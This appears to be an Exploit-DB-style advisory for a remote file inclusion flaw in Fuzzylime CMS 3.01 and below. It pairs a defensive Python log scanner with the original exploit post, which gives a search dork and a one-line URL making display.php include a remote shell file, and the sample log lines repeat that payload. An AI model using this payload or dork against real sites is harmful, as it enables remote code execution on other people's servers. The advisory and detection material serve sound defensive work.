vendor: Fuzzylime CMS
by: irk4z
CVSS: 7.5 HIGH
Remote File Inclusion
CWE: 98
Product Name: Fuzzylime CMS
Affected Version From: 3.01 and below
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: a:fuzzylime:fuzzylime_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Fuzzylime CMS <= 3.01 Remote File Inclusion Vulnerability

Fuzzylime CMS version 3.01 and below is vulnerable to remote file inclusion. The application fails to properly sanitize user-supplied input to the 'admindir' parameter of the 'display.php' script. An attacker can exploit this to include arbitrary remote files and execute arbitrary PHP code with the privileges of the web server process.

Mitigation:

Upgrade to the latest version of Fuzzylime CMS, which is not vulnerable to this issue.
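
For hosts that cannot be upgraded immediately, a log check for the request pattern this advisory describes, as an added example that is not part of the original advisory or of Fuzzylime CMS: it flags any request to code/display.php that supplies admindir. It assumes common/combined access-log format and that no legitimate client ever sends admindir; the function names and sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')
# Value starts with a URL scheme or stream wrapper (http://, ftp://, php://, data:).
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.IGNORECASE)

def classify(line):
    """Return None, 'admindir-set' or 'admindir-remote' for one log line."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/code/display.php"):
        return None
    verdict = None
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is seen as http://...
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != "admindir":
            continue
        if SCHEME_RE.match(value):
            return "admindir-remote"   # include path points off-host
        verdict = "admindir-set"       # parameter present at all: still anomalous
    return verdict

def scan(lines):
    """Return (client_ip, verdict) for every flagged line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Mar/2008:10:01:02 +0000] "GET /cms/code/display.php?s=front&p=index HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Mar/2008:10:02:40 +0000] "GET /cms/code/display.php?admindir=http://host.example/shell.txt? HTTP/1.0" 200 312',
    '198.51.100.7 - - [14/Mar/2008:10:02:55 +0000] "GET /cms/code/display.php?s=a&admindir=hTTp%3A%2F%2Fhost.example%2Fx HTTP/1.0" 200 90',
    '203.0.113.5 - - [14/Mar/2008:10:03:10 +0000] "GET /cms/code/display.php?admindir=admin HTTP/1.1" 200 40',
    '203.0.113.5 - - [14/Mar/2008:10:03:12 +0000] "GET /cms/index.php?admindir=http://host.example/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

A hit only shows that the request was made; whether the include succeeded depends on the server's PHP configuration and needs follow-up on the host.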

Exploit-DB raw data:

.-----------------------------------------------------------------------------.
|  vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability           |
|  download: http://cms.fuzzylime.co.uk/                                      |
|  dork: "powered by fuzzylime"                                               |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

  /code/display.php:
  ... 
1    <?
2    $s = $_GET[s];
3    $p = $_GET[p];
4    $s = str_replace("../", "", $s);
5    $p = str_replace("../", "", $p);
6    if(empty($s)) $s = "front";
7    if(empty($p)) $p = "index";
8    $curs = $s;
9    $curp = $p;
10
11   include "code/settings.inc.php";
12   include "${admindir}/languages/english.inc.php";
 ...

 line 11: ./code/code/settings.inc.php does not exist, so $admindir is empty :D:D
 
# exploit: 
 
 http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]